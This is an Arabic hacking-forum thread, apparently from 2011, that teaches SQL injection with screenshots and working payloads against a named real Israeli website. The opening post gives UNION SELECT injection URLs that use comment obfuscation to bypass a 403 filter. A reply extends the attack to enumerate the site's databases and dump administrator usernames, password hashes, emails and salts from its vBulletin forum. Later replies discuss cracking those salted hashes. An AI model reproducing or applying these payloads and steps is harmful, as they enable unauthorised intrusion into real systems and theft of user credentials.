نحن مع غزة
الـرئـيـسـيـة الـمـنـتـدى سـؤال & اجـابـة الـتـبـرع بـالـدم الاسـتـضـافـة هـلال لـيـنـكـس الـقـرآن الـكـريـم Dz-SeC team


التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"


مطلوب مشرفين على كامل اقسام المنتدى


أخي / أختي , إن تسجيل عضوية جديدة في منتدى شبكة الجزائر للجميع لا يهدف إلى زيادة الأعضاء مطلقا
فلا خير في عضوية عدد مشاركاتها صفرا فنحن نرفض يوميا الكثير من العضويات المشكوك في أمرها
سواء كان هدفها الإعلانات الغير شرعية أو تخريب الموضوعات الخ , كل هذا حتى يبقى المنتدى
ساحة جادة عطرة تجود بالخير لكل زوارها وأعضائها
وصدقة جارية لكل من يشارك في كتابة معلومة تفيد غيره سوف يشكر الله عليها وهو في جوف الأرض ...

لذلك نطلب منك التسجيل بل ونلح عليك إن كان هدفك هو أن تصنع صدقة جارية لا تنقطع إلى يوم الدين بمساعدة إخوانك في نشر الخير .

للتسجيل اضغط هنا وأملأ البينات المطلوبة بشكل صحيح ومن ثم انتظر حتى نقوم بتفعيل حسابك وابدأ رحلتك في صناعة صدقة جارية .

وتذكر قول سيد الخلق " إذا مات ابن آدم انقطع عمله إلا من ثلاث صدقة جارية أو علم ينتفع به أو ولدٍ صالح يدعو له "

   

[ منتدى حـقن قواعد البيانات | Sql injcetion ] قسم يهتم باهم ثـغرات الحقن .. حقن قواعد البيانات واهم الطرق المستعملة في ذلـك ,

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم 23/09/2011, 22:06   المشاركة رقم: 1
المعلومات
الكاتب:
 Amine_92  
اللقب:
عضــــو جديــــد
الصورة الرمزية
 
الصورة الرمزية Amine_92

البيانات
التسجيل : Sep 2011
العضوية : 2930
الاهتمامات : Search Vulenerable Script & SQL INJECTION
الإقامة : AlGeRiA
المواضيع : 12
الردود : 7
المجموع : 19
بمعدل : 0.00 يوميا
الاختراقات : [ليس لدي حساب]
مجتمعنا : [لم اسجل]
الصنف : Gray Hat Hacker
آخر تواجد : 14/09/2014/23:22
سبب الغياب : ربما الدراسة
معدل التقييم: 0
نقاط التقييم: 10
Amine_92 is on a distinguished road
شكراً: 0
تم شكره 5 مرة في 3 مشاركة

 Algeria


الإتصالات
الحالة:
Amine_92 غير متواجد حالياً
وسائل الإتصال:

Talking شرح بالصور تخطي مشكلة Dz4all 2011 | Forbidden




اليوم أتتيت لكم بحل لمشكلة إستعضمتموها كثيرا لكن حلها سهلا جدا

ما عليك متابعة الصور والتطبييق

نبدأ على بركة الله

1- فأر التجربة موقع إسرائيلي

كود PHP:
http://www.sora.co.il 
2- نوعية اللشرح : عن طريق الصور

3- نتيجة العملية : ناجحة 100%

===================================

رابط الإستغلال


كود PHP:
http://www.sora.co.il/games.php?id=105 


نعمل الحقن العادي



نتابع



نعمل على إزالة الخطأ



زال الخطأ الآن نتابع الحقن

لكن الآآآن صادفنااا خطأ Forbidden



الآن نقوم بإضافة تغيير صغير لإزالة الخطأ

كود PHP:
id=105+union+(select+1,2,3,4,5,6)-- 


أزيل الخطأ بإذن الله



إليكم الرابط

كود PHP:
http://www.sora.co.il/games.php?id=105+union+(select+1,version(),3,4,5,6)-- 
أتمنى أن الشرح كان بسيطاااا





آخر مواضيع » Amine_92

عرض البوم صور Amine_92   رد مع اقتباس
2 أعضاء قالوا شكراً لـ Amine_92 على المشاركة المفيدة:
Nassim0x09 (24/09/2011), ViRuS_Ra3cH (24/09/2011)
قديم 24/09/2011, 15:32   المشاركة رقم: 2
المعلومات
الكاتب:
  Nassim0x09  
اللقب:
عضو مميز

الإتصالات
الحالة:
Nassim0x09 غير متواجد حالياً
وسائل الإتصال:

نكمل معاك
بعرض قواعد البيانات هكذا
كود:
http://www.sora.co.il/games.php?id=105+union+%28select+1,schema_name,3,4,5,6+from+information_schema.schemata%29--
نجد عدت قواعد

information_schema
sora_gallery
sora_new
sora_new2
sora_poll
sora_poll2
sora_vb

من هذي sora_vb نلاحظ انها قاعدة منتدى

منتدى
كود:
http://vb.sora.co.il/vb/

جدول يوزرات هوا user في سكريبت vbulletin

نعرض username , password , email , salt

where usergroupid = 6

6 تعني اداريين فقط

هكذا

كود:
http://www.sora.co.il/games.php?id=105+/*!union*/+/*!select*/+1,/*!CoNcAt%28username,0x3a,password,0x3a,email,0x3a,salt%29*/,3,4,5,6+from+sora_vb.user+where+usergroupid=6--
نتيجة عدة ادارين يوجد فرصة فك باسورد احدهم

لكن هناك مشكل

كود:
 http://vb.sora.co.il/vb/admincp/


جدار ناري

و **** لك =]

عرض البوم صور Nassim0x09   رد مع اقتباس
قديم 24/09/2011, 18:09   المشاركة رقم: 3
المعلومات
الكاتب:
 Amine_92  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
Amine_92 غير متواجد حالياً
وسائل الإتصال:

**** لك أخي []
حاولة فك الهاشات لكن من دون جدوى

عرض البوم صور Amine_92   رد مع اقتباس
قديم 24/09/2011, 22:30   المشاركة رقم: 4
المعلومات
الكاتب:
  Nassim0x09  
اللقب:
عضو مميز

الإتصالات
الحالة:
Nassim0x09 غير متواجد حالياً
وسائل الإتصال:

هاش ليس md5
بلا تشفيرة اخرى

اقتباس:
md5(md5($pass).$salt)
إبحث في قوقل عن طريقة فك هاش منتدى vBulletin

عرض البوم صور Nassim0x09   رد مع اقتباس
قديم 24/09/2011, 22:44   المشاركة رقم: 5
المعلومات
الكاتب:
 ApOcalYpse  
اللقب:

الإتصالات
الحالة:
ApOcalYpse غير متواجد حالياً
وسائل الإتصال:

واش نسيم واش راك ادير هنا ههههههههههه

عرض البوم صور ApOcalYpse   رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

الكلمات الدلالية (Tags)
amine_92


حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)
 

(أظهر الكل الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 58
Ѳ҅҅҅҅҅҅҅҅҅҅҅҅҅ , 00X , adamz7dz , ahmad hkr , Amine_92 , amir hide ip , ApOcalYpse , arbi , مستكن , BELHADJ47 , ben ali , benaissa28 , bn6a , br0xo , c41virus , chevr0sky , ال بطيور , dergham , Dr $0uf1 , Dr.xp , dridimido , dzkabyle , Exp Dz , ghost-dz , hacker almooot , hakermal , Igor000rogI , imd004 , دام علاء العماد , kokohack , LeeGT , londre_12 , microsarme6943 , moulay2010 , MR.KaDeRoU , n2nhacker , Nassim0x09 , neo111 , nuclear , pain96 , probably , R3D 3RR0R , S-japonia33 , shalhop , Smail002 , tamir_2005 , tete23232002 , Th3 K!LL3r Dz , ThE JoCkEy , ToP-HaCkEr , Tr0y , عبد الصمد. , ViRuS_Ra3cH , watchful eye , xdvb , yasMouh , فيصل غول , ZiRbE$t

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
تخطي forbidden 403 عن طريق cpanel BlackHunter.Dz [ مـنتدى حمايه المواقع والسيرفرات | Hacking Site's & Servers ] 12 19/06/2015 01:06
تخطي مشكلة Error 403 Forrbidden In Symlink dabelzero [ قــــسم الـــــدروس المـمـيـزه والـحـصـريـات ] 4 05/01/2015 23:39
دورة SQL Injection 2011 كاملة | dz4all Amine_92 [ دورات IS-SEC.ORG الحصرية ] 9 23/09/2013 18:37
حصريا ~ تخطي السيف مود بثغرة الفانتستكو / 2011 b0x [ مـنتدى حمايه المواقع والسيرفرات | Hacking Site's & Servers ] 3 14/07/2011 23:08
طريقة تخطي Forbidden HaCkEr-NOir [ مـنتدى حمايه المواقع والسيرفرات | Hacking Site's & Servers ] 4 26/07/2010 23:03

الساعة معتمدة بتوقيت جرينتش +1 . الساعة الآن : 08:41.
Copy Right Des 2010 - 2014 To is|sec Organization, Des By  yasMouh 
Powered By vBulletin Special Edition, Secured By Dz-SeC team
Support by Dz-SeC team




RSS RSS 2.0 XML MAP HTML



 
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115